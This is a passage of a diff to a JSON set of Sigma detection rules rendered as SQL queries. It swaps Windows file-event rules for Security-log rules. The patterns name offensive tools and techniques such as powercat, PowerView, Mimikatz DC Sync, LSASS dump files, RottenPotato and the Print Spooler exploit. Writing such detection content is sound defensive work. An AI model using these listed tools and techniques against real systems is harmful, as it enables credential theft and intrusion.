TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_not_allowed_rdp_access.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", - "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Local User Creation", + "id": "66b6be3d-55d0-4f47-9855-d69df21740ea", + "status": "test", + "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.", + "author": "Patrick Bareiss", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Unknown" + "Domain Controller Logs", + "Local accounts managed by privileged account management tools" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720')" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_user_creation.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", - "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "status": "test", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ], "falsepositives": [ - "Unknown" + "Companies, who may use these default LDAP-Attributes for personal information" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "Potential Persistence Via Notepad++ Plugins", - "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", - "status": "experimental", - "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", + "status": "test", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.discovery", + "attack.execution", + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" ], "falsepositives": [ - "Possible FPs during first installation of Notepad++", - "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" + "Go utilities that use staaldraad awesome NTLM library" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\target.exe' ESCAPE '\\' OR NewProcessName LIKE '%Installer.x64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_notepad_plus_plus_persistence.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "Suspicious VHD Image Download From Browser", - "id": "8468111a-ef07-4654-903b-b863a80bbc95", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", "status": "test", - "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate user creation" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_mal_vhd_download.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "title": "Add or Remove Computer from DC", + "id": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "status": "experimental", + "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", + "author": "frack113", "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4741', '4743'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_add_remove_computer.yml" }, { - "title": "Drop Binaries Into Spool Drivers Color Folder", - "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_spool_drivers_color_drop.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Publisher Attachment File Dropped In Suspicious Location", - "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", - "status": "experimental", - "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "status": "test", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of \".pub\" files from those locations" + "Legitimate use of remote PowerShell execution" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "ScreenConnect Temporary Installation Artefact", - "id": "fec96f39-988b-4586-b746-b93d59fd1922", + "title": "Access to ADMIN$ Share", + "id": "098d7118-55bc-4912-a836-dc6483a8d150", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects access to $ADMIN share", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate use" + "Legitimate administrative activity" + ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5140' AND ShareName = 'Admin$') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + ], + "filename": "win_security_admin_share_access.yml" + }, + { + "title": "Defrag Deactivation - Security", + "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "status": "test", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ], + "falsepositives": [ + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" ], - "filename": "file_event_win_screenconnect_artefact.yml" + "filename": "win_security_apt_slingshot.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "Potential Initial Access via DLL Search Order Hijacking", - "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", - "author": "Tim Rauch (rule), Elastic (idea)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1574", - "attack.t1574.001", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "Suspicious desktop.ini Action", - "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", - "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Operations performed through Windows SCCM or equivalent", - "Read only access list authority" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_desktop_ini.yml" + 